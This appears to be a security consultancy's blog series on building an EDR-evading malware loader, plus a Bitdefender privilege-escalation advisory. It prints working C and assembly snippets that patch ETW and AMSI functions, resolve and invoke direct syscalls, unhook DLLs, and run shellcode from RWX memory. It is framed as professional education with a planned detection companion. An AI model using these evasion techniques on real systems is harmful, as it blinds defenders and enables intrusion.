Loader Dev. 4 – AMSI and ETW

In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Disclaimer

These posts are written to inform other professionals about the topics discussed.

The techniques used here are not novel and were documented by other people before. Therefore, the benefits of these posts for threat actors will likely be minimal. Nonetheless, we decided against releasing a full PoC implementation and will instead only provide code snippets as part of the posts. All credit should go to the people who did the original research on the techniques used.

There will also be an accompanying blog post on detecting or hunting for malware using the discussed techniques to enable readers to protect their environment.

Background

ETW

Event Tracing for Windows (ETW) collects events from a process, which can then be retrieved e.g. by an EDR or AV solution. This could allow the detection of our payload. An article that discusses more details can be found here. An easy way to see the effect of patching ETW is to inspect the process with Process Hacker after loading a C# assembly. The following screenshot was taken without patching ETW:

This screenshot shows that Rubeus was loaded into our process. If Process Hacker can see this, an EDR can detect it as well. The next screenshot shows the same window, but this time ETW was patched before the C# assembly was loaded:

Kolja Grassmann

Consultant

As we can see, there is no information about the loaded assemblies available.

AMSI

AMSI is another feature provided by Microsoft. Here, an EDR or AV solution can register as a provider and will then get handed e.g. C# assemblies or PowerShell scripts before they are executed. This is done automatically e.g. while loading a C# assembly. Our payload would be unencrypted at this point and could therefore be detected.

As both ETW and AMSI are implemented in user space, we can interfere with them from there. Note, however, that attacking these features might lead to detection and it might make sense to use more creative solutions than we did in this post.

Patching functions

Like the hooks placed by EDRs, we can simply modify functions that are needed for ETW or AMSI. Note that both locations at which we are currently patching functions are well-known and patches at these locations will likely be detected by at least some EDRs.

ETW

For ETW, the NtTraceEvent syscall hands the event data over to the kernel, from which it can later be retrieved. Therefore, patching the NtTraceEvent stub in ntdll.dll so that it no longer hands over the information should disable the feature for our process. There are other ETW-related functions as well, but NtTraceEvent seems to be central to the functionality of ETW and is therefore a good option. A PoC can be found here. The implementation in our loader looks as follows:

// Get a handle to ntdll
HANDLE ntdll_handle = GetModuleHandle("ntdll.dll");

// Get the address of NtTraceEvent
LPVOID nttraceevent_address = GetProcAddress(ntdll_handle, "NtTraceEvent");

// We need a copy as ntprotectvirtualmemory might overwrite our address
LPVOID nttraceevent_address_copy = nttraceevent_address;

// Change the protections of the function so we can write
DWORD oldprotect = 0;
SIZE_T size = 4096;
pNtProtectVirtualMemory((HANDLE)-1, &nttraceevent_address_copy, &size, PAGE_EXECUTE_READWRITE, &oldprotect);

// Write a return opcode at offset 3
memcpy(nttraceevent_address+3, "\xc3", 1); // ret

// Change the protections back to the original ones
pNtProtectVirtualMemory((HANDLE)-1, &nttraceevent_address, &size, PAGE_EXECUTE_READ,&oldprotect);

AMSI

For AMSI, we can patch, for example, the AmsiScanBuffer function. The implementation currently looks very similar to the one for ETW, but we additionally need to ensure that amsi.dll is loaded:

// Get a handle to amsi.dll
HMODULE amsi_handle = LoadLibraryA("amsi.dll");

// Get the address of the AmsiScanBuffer function
LPVOID amsiscanbuffer_address = GetProcAddress(amsi_handle, "AmsiScanBuffer");

// We need a copy as ntprotectvirtualmemory might overwrite our address
LPVOID amsiscanbuffer_address_copy = amsiscanbuffer_address;

// Change the protections of the function so we can write
DWORD oldprotect = 0;
SIZE_T size = 4096;
NtProtectVirtualMemory((HANDLE)-1, &amsiscanbuffer_address_copy, &size, PAGE_READWRITE,&oldprotect);

// Write a return opcode at offset 3
memcpy(amsiscanbuffer_address+3, "\xc3", 1); // ret

// Change the protections back to the original ones
NtProtectVirtualMemory((HANDLE)-1, &amsiscanbuffer_address, &size, oldprotect,&oldprotect);

In our opinion, this is suspicious, as we are forcing a load of amsi.dll at a point where it is not needed. A better strategy would be to invoke legit functionality, which causes amsi.dll to be loaded, and to then patch it after it was loaded.

Vectored Exception Handling

There is a blog post by EthicalChaos that discusses evading AMSI without making changes to the process memory. This works by setting a hardware breakpoint on the previously discussed functions and then using a Vectored Exception Handler to handle this hardware breakpoint. Our exception handler can then force the function to return and specify a return value indicating that everything went well. A public implementation of this approach shows the details.

Library Loads (AMSI)

Another idea for disabling AMSI is to prevent amsi.dll from being loaded. This could e.g. be done by adding a hook to LdrLoadDll in ntdll.dll to filter the DLLs we allow our process to load. This is done by batsec in a sample solution.

Summary

In this post, we looked at disabling ETW and AMSI for our process, which is especially relevant for loading C# executables. In the next post, we will finally be discussing how to load our actual payload and how well the loader fares against security products.

Loader Dev. 3 – Evading userspace hooks

In this post, we will go over techniques to avoid hooks placed into memory by an EDR.

Hooks

We will start by discussing how hooks work. This information will serve as background knowledge for the later sections in which we will explain how to circumvent these hooks.

IAT Hooks

One way to hook functions is to replace the address of the function in the Import Address Table (IAT) with the address of the hooking logic. If our executable then uses the IAT to resolve a function, it will invoke the hooking logic instead. However, this is not that relevant for our purposes here, as we are not using the IAT for our function resolution. Our understanding is that most EDRs prefer trampoline hooks over IAT hooks. We will discuss trampoline hooks in the next section.
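To make the table-replacement idea concrete, the following is a minimal, portable sketch that models an import table as an array of function pointers. It does not touch a real PE import table; the names import_slot, install_table_hook, real_double and hook_double are hypothetical and exist only for this illustration.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical stand-in for an import table: one slot per imported function. */
typedef int (*api_fn)(int);

struct import_slot {
    const char *name;
    api_fn      target;
};

static int    calls_seen = 0;           /* number of calls observed by the hook */
static api_fn original_target = NULL;   /* saved so the hook can forward the call */

/* The "real" implementation behind the table entry. */
static int real_double(int x) { return 2 * x; }

/* Hooking logic: record the call, then forward it to the original function. */
static int hook_double(int x) {
    calls_seen++;
    return original_target(x);
}

/* Replace the table entry called `name` with `hook`; returns 0 on success, -1 if not found. */
static int install_table_hook(struct import_slot *table, size_t count,
                              const char *name, api_fn hook) {
    assert(table != NULL && name != NULL && hook != NULL);
    for (size_t i = 0; i < count; i++) {
        if (strcmp(table[i].name, name) == 0) {
            original_target = table[i].target;
            table[i].target = hook;
            return 0;
        }
    }
    return -1;
}
```

Calls that go through the table entry now pass through hook_double first, while a caller that holds the address of real_double directly is not observed. This mirrors why a table-based hook does not affect code that resolves functions without using the table.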

Inline/Trampoline hooks

Instead of hooking the IAT, we can also overwrite the start of a function with a jump to our hooking logic. If the function is then called, the jump to our logic is executed first and we can analyze the function call before handing over the execution to the original logic. This is shown in the following figure:

Hooks in the real world

So let’s have a short look at how this looks in the real world. For this, we will use an unnamed EDR, which hooks certain functions. One hooked function is NtCreateThread. Let us first look at this function without the hook in place:

With the hook in place the function looks as follows:

As we can see, there is an unconditional jump added at the start of the function. In this case, the remaining space is filled with int3 instructions. Note that there are more instructions in the second screenshot, as instructions can differ in size on Intel architectures. The jump will allow the EDR to analyze our function call and its arguments before doing the actual NtCreateThread syscall.

Avoiding hooks

Now that we have covered how EDR products might hook certain functions, we will start discussing how to avoid these hooks.

Moving to lower-level functions

In many cases, the functions documented by Microsoft and used by most programmers, like VirtualProtect, are wrappers around lower-level functions and provide a more convenient and stable interface for them. With VirtualProtect, the actual call stack when interacting with the kernel, which changes the protections, is as follows:

As we can see, we could also use the NtProtectVirtualMemory function directly instead of VirtualProtect. Note that we are sacrificing some convenience here and that undocumented functions might be changed by Microsoft at any point.

In the past, some EDRs only hooked functions at a higher level. Therefore, it was possible to avoid hooks by calling lower-level functions directly. By now, in most cases, hooks are also placed in ntdll.dll, which is the interface between user space and the kernel. Therefore, it is generally no longer possible to avoid hooks by moving to lower-level functions.

Loading a second copy

Another strategy to avoid hooks is to load another copy of the used DLL into memory and then use the second copy for our calls. However, this has the disadvantage that loading the copy into memory alone could be detected and deemed malicious. Therefore, if we do not have a way to do it without encountering hooks, this might not work. It also leaves the obvious indicator of compromise, that there are two loaded copies of ntdll.dll.

Direct syscalls

Most functions in ntdll.dll are thin wrappers around a syscall instruction: they place the appropriate syscall number into the eax register and hand over control to the kernel. We can see this in the following screenshot, which shows the NtProtectVirtualMemory function:

We can replicate this by using our own syscall instruction with the right syscall number. Therefore, our next step will be finding the syscall number for the syscall we want to do.

1. Hardcoding the syscall numbers

One way to gather the syscall numbers is to look at the ntdll.dll file and create a mapping between the function we want to invoke and the syscall number. Unfortunately, the syscall numbers depend on the build of Windows and we can therefore only hardcode them if we know the specific version of Windows we are targeting. This approach is used e.g. by SysWhispers.

2. Parsing ntdll.dll dynamically

We could also parse the syscall numbers from the ntdll.dll present on the system, which would then be the correct numbers for the targeted build version. One way to do this is to use the copy already mapped into memory to retrieve the syscall number, as is done by HellsGate. Here, however, we again face the problem that this copy might be hooked and therefore might no longer contain our syscall numbers.

We could also retrieve a clean copy of ntdll.dll from disk. However, opening a fresh copy of ntdll.dll might be suspicious and could be detected by the EDR, as we are using the hooked logic to open the file.

As with unhooking, at which we will take a closer look later in this post, an alternative way here could be to create a suspended process and read the clean copy of e.g. ntdll.dll from its memory before an EDR had the opportunity to place its hooks. Again, the main issue here is that the functions we would use are potentially hooked, which could lead to us being detected.

3. Using function order in memory

Fortunately, we can also find the syscall numbers dynamically by relying on the order of the syscalls in memory. The syscall numbers are sequential in memory, as can be seen in the following screenshot:

As you can see, the functions following each other in memory also have sequential syscall numbers (0x4c-0x50).

There are two strategies that we are aware of that use this order to retrieve the syscall numbers. The first one is Halo’s Gate, which we learned about in the course material from Sektor7. This strategy is basically the same as HellsGate, but instead of parsing the syscall number from the copy in memory and stopping if a hook overwrote the syscall number, we continue our search in the functions above and below the function for which we want to retrieve the syscall number. The offset between these functions is always 32 bytes, and if we find the syscall number of a neighbor, we can use the number of functions we moved away from our target to calculate the syscall number we are searching for.

One disadvantage of Halo’s Gate is that we still need to find a syscall number in memory. While this is likely possible as not all functions will be hooked, it could still be prevented by an EDR that hooks all functions in ntdll.dll. Instead, we can use the method used by FreshyCalls (this is a fork as we did not find the original repo). The basic idea here is that we sort all function names by their address. Afterward, we can search this list for our function name and use its index in the sorted list as the syscall number. As we are not relying on reading the syscall number from memory, this should work even if all syscall numbers have been removed from memory, as long as the order does not change (which is not a given, as Microsoft could change this with every update). As this is one method we decided to port to C, we will cover this in more detail here.

Like FreshyCalls, I defined a struct that contains the mapping between the syscall name and address:

// Struct holding the syscall name and its address
struct SYSCALL_ENTRY {
    char* name;
    DWORD address;
};
// Struct holding the number of found syscalls, as well as the ntdll.dll base address and an array of SYSCALL_ENTRY structs
struct SYSCALL_LIST {
    DWORD size;
    char* pBaseAddress;
    struct SYSCALL_ENTRY entries[MAX_SYSCALL_ENTRIES];
};

We initially fill this with all functions in ntdll.dll (see part 2 for a more detailed description) that start with nt, but not with ntdll (ignoring case):

DWORD* Functions = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfFunctions);
DWORD* Names = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfNames);
WORD* Ordinals = (WORD*)(pBaseAddr + pExportDirAddr->AddressOfNameOrdinals);
DWORD j = 0;
for (DWORD i=0; i < pExportDirAddr->NumberOfNames; i++) {
    char* FunctionName = pBaseAddr + Names[i];
    if([...]) { // Starts with nt, but not ntdll
        syscall_list.entries[j].name = FunctionName;
        syscall_list.entries[j].address = Functions[Ordinals[i]];
        j++;
    }
}
syscall_list.size = j;
syscall_list.pBaseAddress = pBaseAddr;

Finally, we will sort all the entries by their address:

for (DWORD i = 0; i + 1 < syscall_list.size; i++) {
    for (DWORD j = 0; j + 1 < syscall_list.size - i; j++) {
        if (syscall_list.entries[j].address > syscall_list.entries[j + 1].address) {
            // Swap the two entries with a plain struct assignment.
            struct SYSCALL_ENTRY TempEntry = syscall_list.entries[j];
            syscall_list.entries[j] = syscall_list.entries[j + 1];
            syscall_list.entries[j + 1] = TempEntry;
        }
    }
}

The index at which our function is located is the syscall number that we are searching for. Therefore, we can iterate over our structure as follows and return the syscall number when we find our function:

for (DWORD i=0; i < syscall_list.size; i++) {
    if ( strcmp(syscall_name, syscall_list.entries[i].name)== 0) {
        return i;
    }
}
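As an aside, the sort-then-lookup step can also be expressed with the standard library's qsort. The following is a minimal sketch on made-up data, not the code used in the loader; demo_entry, compare_by_address and index_after_sort are hypothetical names, and the entry names and addresses in the usage note are invented.

```c
#include <assert.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical, simplified stand-in for the SYSCALL_ENTRY struct shown earlier. */
struct demo_entry {
    const char *name;
    uint32_t    address;   /* relative address of the function */
};

/* qsort comparator: ascending by address, written to avoid subtraction overflow. */
static int compare_by_address(const void *a, const void *b) {
    const struct demo_entry *ea = a;
    const struct demo_entry *eb = b;
    return (ea->address > eb->address) - (ea->address < eb->address);
}

/* Sort the entries by address, then return the index of `name`, or -1 if it is absent. */
static int index_after_sort(struct demo_entry *entries, size_t count, const char *name) {
    assert(entries != NULL && name != NULL);
    qsort(entries, count, sizeof(entries[0]), compare_by_address);
    for (size_t i = 0; i < count; i++) {
        if (strcmp(entries[i].name, name) == 0) {
            return (int)i;
        }
    }
    return -1;
}
```

With three invented entries FuncC at 0x3040, FuncA at 0x3000 and FuncB at 0x3020, the lookup for FuncB yields index 1, because FuncB has the second-lowest address.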

4. Using Vectored Exception Handling

Another option would be to call our syscall using non-malicious arguments with the hooks in place so that no detection is triggered. Before doing the call, we set a breakpoint at the syscall instruction and use Vectored Exception Handling to handle this breakpoint. Even if the EDR has removed the syscall number from the ntdll.dll memory, it will be placed in EAX before the syscall. So, when our exception is triggered the right syscall number will be in EAX and we can retrieve it in our exception logic. This is described by rad98 in this blog post.

5. Doing the syscall

Using the syscall number, we can replicate the behavior of the function present in ntdll.dll. For this, SysWhispers ships its own syscall instruction. This, however, seems like an easy pattern that AV software could check for, as there is no reason to use this instruction in an executable. In our understanding, it should only be present in ntdll.dll. Instead, we can use a gadget from ntdll.dll, which our code jumps to when performing the actual syscall, as done by FreshyCalls. This has the additional advantage that the call originates from ntdll.dll, which could be beneficial if the call stack is checked by an EDR in the kernel.

For this purpose, we implemented logic that searches ntdll.dll for a syscall instruction. We can start at the address of our target function and then search for a syscall instruction as follows:

for(int i = 0; i < 200; i++) {
    if(*( function_base_address + i) == 0x0F && *(function_base_address + i +1) == 0x05) {
        return (unsigned char*) (function_base_address + i);
    }
}

This is not a clean solution, as we are relying on the fact that the instructions are present either in our function or in one of the functions located directly afterwards. It would be cleaner to search specifically within our function and then start at the beginning of the .text segment in order to find a syscall instruction if there is one present. Changing this is still on our TODO list.

As the loader uses MinGW, we can use the following code to store our syscall gadget and the syscall number in the required registers:

register unsigned char* syscall_gadget asm("r11") = tmp_syscall_gadget;
register unsigned int syscall_number asm("rax") = tmp_syscall_number;

Afterward, we can use the following assembly stub to execute the syscall:

// At the beginning of our function we ensure that all arguments are saved on the stack (assuming the Microsoft x64 calling convention)
// Here we put them into registers again, as our logic will likely have clobbered the original values
movq 0x10(%rbp), %rcx // restore first argument
movq 0x18(%rbp), %rdx // restore second argument
movq 0x20(%rbp), %r8 // restore third argument
movq 0x28(%rbp), %r9 // restore fourth argument. Everything after this is passed on the stack anyway.

mov %rcx, %r10 // replicate normal syscall stub behaviour
mov %rbp,%rsp // get rid of local variables, which we no longer need
pop %rbp  // restore base pointer
jmp %r11  // jmp to our gadget

This logic makes some assumptions on how our compiler implements the function (e.g. that rbp is stored on the stack). We verified that this is indeed the case in our implementation. However, future versions of the compiler or different implementations might need some adjustments here.

As we are directly calling the syscall from our code, which will not have been hooked by the EDR, this avoids any hooks that might have been placed in user space.

Unhooking

Using direct syscalls is often inconvenient and might lead to a lot of maintenance, as these interfaces might change at any time. Therefore, we should keep our usage of direct syscalls to a minimum. Furthermore, the payload we load will likely use the Windows APIs, which an EDR will still have hooked at this point.

The hooks will likely be placed by the EDR during the initialization of our process or when a new library is loaded. As discussed before, these hooks are most likely trampoline hooks, which are placed at the beginning of the targeted functions. As the functions reside in user space, we can overwrite them ourselves, too. This means that we can revert the changes made by the EDR to the function instructions, which is basically what we will be doing when unhooking our process.

IAT Unhooking

As discussed initially, one way to hook functions is by overwriting function addresses in the IAT. Because this seemed less relevant, we decided against integrating this for now. If you are searching for inspiration, have a look at this project, which implements IAT unhooking. There is also an accompanying blog post, which we highly recommend, that explains what we are doing. To summarize the post: We would iterate over the IAT and recalculate the function addresses by looking at the Export Address Table (EAT) of the DLL implementing the function. If the function address differs, we then overwrite the presumably hooked address with our newly calculated one.

Removing inline hooks

To remove inline hooks, we first need access to a clean version of the DLL. We can retrieve a clean version of the DLL from the original file on disk, as the DLLs are only hooked during runtime. Another option would be to start a suspended process and retrieve a clean version of the loaded DLLs before the EDR had the opportunity to hook them. For DLLs included as \KnownDlls\, it is also an option to call NtOpenSection to get a section handle, which can then be used to map the DLL into our process. The \KnownDlls\ entries are a caching mechanism for the more important DLLs used by the system; this technique works e.g. for ntdll.dll.

After we have a clean copy of our target DLL, we then use it to remove any hooks from the .text section of the DLL loaded by our process. The simplest way to do this is to overwrite the complete text section with the clean version. This works well for ntdll.dll; however, I am not sure if it is the best approach for other DLLs. A more fine-grained approach is to check if a hook is in place for each function and then only overwrite the hook if that is the case.

In our case, the implementation was heavily inspired by this code, as this seemed to be the simplest way to achieve the unhooking using only direct syscalls. It uses the \KnownDlls\ path and checks for a jmp at the beginning of each function to evaluate if a certain function is hooked. If this is the case, the start of the function is overwritten with the instructions from the clean version of the DLL. I decided to only unhook kernel32.dll, kernelbase.dll and ntdll.dll. In a future version of the loader, it might be nice to unhook all loaded DLLs. However, we suspect that with these three DLLs, most of the hooks encountered in practice should be covered.
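The check for a jmp at the start of a function can be illustrated on plain byte buffers. The sketch below only inspects bytes it is given and does not read or modify any loaded module; the helper names starts_with_jmp and prologue_differs are hypothetical. It assumes the hook uses a near jmp with a 32-bit relative offset (opcode 0xE9); hooks that use other instruction forms would be missed by the first helper, which is why a comparison against a clean copy is shown as well.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

#define OPCODE_JMP_REL32 0xE9   /* near jmp with a 32-bit relative offset */

/* Returns 1 if the buffer is long enough for a jmp rel32 and starts with its opcode. */
static int starts_with_jmp(const unsigned char *prologue, size_t len) {
    assert(prologue != NULL);
    return len >= 5 && prologue[0] == OPCODE_JMP_REL32;
}

/* Returns 1 if the first `len` bytes of the loaded copy differ from the clean copy. */
static int prologue_differs(const unsigned char *loaded,
                            const unsigned char *clean, size_t len) {
    assert(loaded != NULL && clean != NULL);
    return memcmp(loaded, clean, len) != 0;
}
```

For example, a clean stub beginning with the bytes 4C 8B D1 B8 (mov r10, rcx followed by mov eax, imm32) is not flagged, while a buffer beginning with E9 followed by a four-byte offset and int3 padding is flagged by both helpers. The same comparison is also useful defensively, e.g. to verify whether a function prologue in a process has been altered.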

After we have executed this, we should no longer have hooks in our loaded DLLs and should therefore be harder to detect even when using functions provided by the loaded DLLs instead of direct syscalls. Note, however, that the removal of hooks itself might be an indicator of malicious intent and therefore we need to evaluate whether unhooking makes sense in our use case.

Dynamic unhooking

While looking into this topic, we found an implementation of dynamic unhooking by mgeeky. The idea here is that instead of unhooking the DLLs we consider relevant at the beginning of our execution, we integrate the unhooking logic into our dynamic function resolution logic (see part 2 of this series). This way we can dynamically unhook only the functions we use, which should be much stealthier. It also makes it harder for an EDR to notice the unhooking by checking whether its hooks are still in place, as most of them will be. Therefore, this seems like a great idea; however, as our payload is not aware of our dynamic function resolution logic, this seems less relevant for developing a loader than e.g. for a custom C2 framework. To make this work within a loader, we would need to ensure that the payload uses this dynamic function resolution logic, which does not seem trivial and which we therefore decided against.

Kernel level detections

The hooks placed by the EDR, which we discussed previously, are located in user space. There is, however, also the possibility that the logic detecting us resides in kernel space. This logic could then e.g. detect our direct syscalls or our function call after we removed the hooks.

Kernel Callbacks

Drivers can register callbacks for some events in the kernel, like the creation of a new process. An EDR that ships with a kernel driver could register such a callback and react to the event. There is a non-comprehensive list of kernel callbacks linked in this awesome series on C2 development.

ETW TI

Another component in the kernel that might still lead to detection is ETW TI. This is a component implemented by Microsoft and therefore heavily used by their EDR, while other EDRs are, to the best of my knowledge, just starting to use it. It is a version of ETW that is implemented in the kernel and logs information about events triggered by a process. I found this blog post helpful for gaining a bit more insight into ETW TI.

Call Stack Spoofing

One thing an EDR could look at to detect direct syscalls or the malicious use of functions is the call stack of the call. If the call stack does not contain the expected calls or contains suspicious addresses that, for example, are not backed by a file, this could lead to detection.

There are multiple projects to avoid this. There is, for example, an implementation by mgeeky that places a 0 into the call stack of a sleeping thread to stop the unwinding process. There is also this blog post, which discusses spoofing a call stack using a new thread to make an unsuspicious syscall. Another implementation is part of AceLdr, which uses a jmp gadget to avoid calls from a suspicious location.

EDR Sandblast

EDR Sandblast is a tool that uses a vulnerable driver to execute code in the kernel. It can then remove any kernel callbacks and also deactivate ETW TI. This tool is quite powerful and has other features as well. However, Microsoft is starting to lock down the loading of drivers by requiring them to be signed and by introducing a blacklist for vulnerable drivers. Therefore, if the target system is sufficiently hardened, we might need a custom signed driver or an exploitable zero-day in another driver to use a similar approach.

Summary

In this post, we took a quick look at how hooks work. We then discussed how to evade them using direct syscalls. Here we covered different options for resolving syscall numbers. Afterwards, we discussed unhooking, which will be useful to ensure that our payload stays undetected during execution, as these hooks would likely allow an EDR solution to recognize some of our payloads by their call patterns. In the next post, we will discuss evading AMSI and ETW to ensure that our payload is even harder to detect during runtime.

Vulnerability in Bitdefender (CVE-2023-6154)

Bitdefender produces different antivirus products. The privilege escalation vulnerability existed in Bitdefender Total Security, Internet Security, Antivirus Plus and Antivirus Free.

Local Privilege Escalation Vulnerability in Bitdefender

The fixed vulnerability allowed an attacker to escalate their privileges to SYSTEM on a system that the attacker already had access to.

This was possible by using COM-Hijacking to execute code in the context of a trusted front-end process. The trust between the front end and the back end was then abused to write registry values as SYSTEM, allowing an attacker to execute code as SYSTEM.

We want to thank Bitdefender for their exemplary reaction to the vulnerability report.

CVSS Score
7.8 (CVSS v3) – https://nvd.nist.gov/vuln/detail/CVE-2023-6154

CVSS Vector String
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Affected Versions
Total Security: 27.0.25.114; Internet Security: 27.0.25.114; Antivirus Plus: 27.0.25.114; Antivirus Free: 27.0.25.114.

Fixed Version
27.0.25.115

References
https://www.bitdefender.com/support/security-advisories/local-privilege-escalation-in-bitdefender-total-security-va-11168/

Credits
Kolja Grassmann (cirosec GmbH) and Alain Rödel (Neodyme)

Loader Dev. 2 – Dynamically resolving functions

In this post, we discuss dynamically resolving functions, which helps to avoid static detections based on the functions imported by our executable.

Imports

The functions our executable uses are by default easily viewable in its imports section. The following code could be used in a basic loader:

#include <stdio.h>
#include <windows.h>

int main() {
  unsigned char shellcode[] = [...];
  unsigned char* base_address = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
  memcpy(base_address, shellcode, sizeof(shellcode));
  ((void(WINAPI*)(void))base_address)();
}

After compilation, we can view the imports of our executable e.g. using PE-bear:

Note that the VirtualAlloc function is imported by our executable. AV solutions consider these imports when evaluating whether our executable is malicious. Therefore, we should avoid suspicious function imports like the VirtualAlloc function.

Dynamic function resolution

It is possible to dynamically resolve function addresses by using the GetModuleHandle or LoadLibraryA and GetProcAddress functions. By using these functions, we could avoid importing VirtualAlloc:

#include <stdio.h>
#include <windows.h>

int main() {
  unsigned char shellcode[] = [...];
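  // The cast must be parenthesized so that it applies to the resolved pointer and not to the result of the call
  unsigned char* base_address = ((unsigned char*(WINAPI*)(LPVOID,SIZE_T,DWORD,DWORD))GetProcAddress(GetModuleHandle("Kernel32.dll"), "VirtualAlloc"))(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);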
  memcpy(base_address, shellcode, sizeof(shellcode));
  ((void(WINAPI*)(void))base_address)();
}

As can be seen in the following screenshot, the VirtualAlloc function is now no longer imported, but the functions used for resolving it will be imported:

These functions themselves might be considered suspicious; therefore, it is better to implement a custom version of these functions by parsing the PE structure manually to resolve functions. We will go over this in the following section.

Custom implementation

In this section, we will cover how to manually resolve a function. As with the GetModuleHandle and GetProcAddress functions, we will need to know the name of the function and the DLL the function is exported by. Our implementation uses the actual name of the function or DLL. However, there are other implementations out there that use hashes of the DLL and function names instead. This has the advantage that these implementations do not ship the function names in their executable, which might be suspicious. To achieve a similar effect, we chose to encrypt the strings in the code used by our loader instead of using a hash.

Custom GetModuleHandle()

The first step is to resolve the loaded module using the DLL name. For this, we first take a look at the Thread Environment Block (TEB). On 64-bit systems, the GS segment register points to the TEB of the current thread. At offset 0x60 in the TEB, there is a pointer to the Process Environment Block (PEB).

typedef struct _TEB {
  PVOID Reserved1[12];
  PPEB  ProcessEnvironmentBlock;
  [...]
} TEB, *PTEB;

In the PEB we will find a pointer to a PEB_LDR_DATA structure:

typedef struct _PEB {
  BYTE                          Reserved1[2];
  BYTE                          BeingDebugged;
  BYTE                          Reserved2[1];
  PVOID                         Reserved3[2];
  PPEB_LDR_DATA                 Ldr;
  [..]
} PEB, *PPEB;

This structure then contains a list of the modules that are loaded by the current process:

typedef struct _PEB_LDR_DATA {
  BYTE       Reserved1[8];
  PVOID      Reserved2[3];
  LIST_ENTRY InMemoryOrderModuleList;
} PEB_LDR_DATA, *PPEB_LDR_DATA;

The LIST_ENTRY structure is a node of a doubly linked list and is defined as follows:

typedef struct _LIST_ENTRY {
   struct _LIST_ENTRY *Flink;
   struct _LIST_ENTRY *Blink;
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;

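Each of these LIST_ENTRY structs is part of an LDR_DATA_TABLE_ENTRY. Note that the Flink pointer points to the InMemoryOrderLinks field of the next entry and not to the start of that entry. The structure provided by Microsoft is as follows: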

typedef struct _LDR_DATA_TABLE_ENTRY {
    PVOID Reserved1[2];
    LIST_ENTRY InMemoryOrderLinks;
    PVOID Reserved2[2];
    PVOID DllBase;
    PVOID EntryPoint;
    PVOID Reserved3;
    UNICODE_STRING FullDllName;
    BYTE Reserved4[8];
    PVOID Reserved5[3];
    union {
        ULONG CheckSum;
        PVOID Reserved6;
    };
    ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;

However, we can find a more complete structure in the ProcessHacker source code. Here we see that there is also a BaseDllName directly after the FullDllName. Our understanding is that the FullDllName includes the full path, while the BaseDllName does not. The BaseDllName is therefore more convenient for our use case.

We can compare the BaseDllName of each entry to the name of the module we are searching for and return the DllBase field if we find our DLL. If we arrive back at the LIST_ENTRY structure we initially found in the PEB, then we have looked at all modules without finding the target DLL and should return NULL to indicate that the module was not found.

Custom GetProcAddress()

With the handle to our module, we then can resolve an actual function as GetProcAddress would do. Again, we will traverse several different structures to find the relevant fields. The first structure we will look at is the IMAGE_DOS_HEADER structure. The definition can e.g. be found in the ReactOS source code:

typedef struct _IMAGE_DOS_HEADER {
    [..]
    LONG e_lfanew; // File address of new exe header
} IMAGE_DOS_HEADER, *PIMAGE_DOS_HEADER;

The last field here is named e_lfanew and contains the offset to the IMAGE_NT_HEADERS structure, which we need to look at next. Our understanding is that the IMAGE_DOS_HEADER structure is a legacy structure, so for most purposes we move on directly to the IMAGE_NT_HEADERS structure. The definition for this structure looks as follows:

typedef struct _IMAGE_NT_HEADERS64 {
    DWORD Signature;
    IMAGE_FILE_HEADER FileHeader;
    IMAGE_OPTIONAL_HEADER64 OptionalHeader;
} IMAGE_NT_HEADERS64, *PIMAGE_NT_HEADERS64;

Of interest to us is the OptionalHeader field. The definition looks as follows:

typedef struct _IMAGE_OPTIONAL_HEADER64 {
  [...]
  IMAGE_DATA_DIRECTORY DataDirectory[IMAGE_NUMBEROF_DIRECTORY_ENTRIES];
} IMAGE_OPTIONAL_HEADER64, *PIMAGE_OPTIONAL_HEADER64;

Here we specifically want to look at the DataDirectory field, which is the last field. The definition looks as follows:

typedef struct _IMAGE_DATA_DIRECTORY {
  DWORD VirtualAddress;
  DWORD Size;
} IMAGE_DATA_DIRECTORY, *PIMAGE_DATA_DIRECTORY;

DataDirectory is an array in which each index has a fixed meaning. The index that is of interest to us is IMAGE_DIRECTORY_ENTRY_EXPORT, whose entry describes the export directory of the module. The VirtualAddress stored there is an offset from the base address of our module. Using the base address and this offset, we can find the IMAGE_EXPORT_DIRECTORY structure, for which ReactOS again has a definition:

typedef struct _IMAGE_EXPORT_DIRECTORY {
  [...]
  DWORD NumberOfFunctions;
  DWORD NumberOfNames;
  DWORD AddressOfFunctions;
  DWORD AddressOfNames;
  DWORD AddressOfNameOrdinals;
} IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;

The AddressOfNames, AddressOfNameOrdinals, and AddressOfFunctions fields are again offsets from the base address of the module, also called relative virtual addresses (RVAs). The AddressOfNames field points to an array containing the RVAs of the names of the exported functions, and the NumberOfNames field contains the number of entries in this array. We can iterate over these names and compare them to the name of the function we are searching for. If we find our function, we use the index at which we found the name to read the matching entry from the AddressOfNameOrdinals array. This ordinal is then used as an index into the AddressOfFunctions array to find the RVA of our function. Adding the base address of the module gives us, in most cases, the address that GetProcAddress() would return.

In some cases, the export is forwarded to another DLL. Since we choose the DLL and function names for our own loader, this is somewhat unlikely, and we could usually work around it by passing the name of the DLL that the call is forwarded to. However, if we want to handle this in our implementation, we can recognize a forwarded export because the address we retrieve in the final step then points to a string inside the export directory instead of to code. We can therefore check whether this address lies within the range described by the VirtualAddress and Size fields of our IMAGE_DATA_DIRECTORY entry and handle these cases differently.

If the function is forwarded, our understanding is that its address points to a string of the form DLLNAME.FUNCTIONNAME. Therefore, we can parse this string and then invoke our logic again with the new DLL and function name.

A full implementation of the discussed logic can e.g. be found in @C5pider’s KaynLdr.

Strings

As mentioned before, the strings that we use to dynamically resolve functions can indicate that we are trying to hide a suspicious import. We can find these strings manually using the strings command on Linux:

$ strings basic_loader.exe | grep "Virtual"
VirtualAlloc
  VirtualQuery failed for %d bytes at address %p
  VirtualProtect failed with code 0x%x
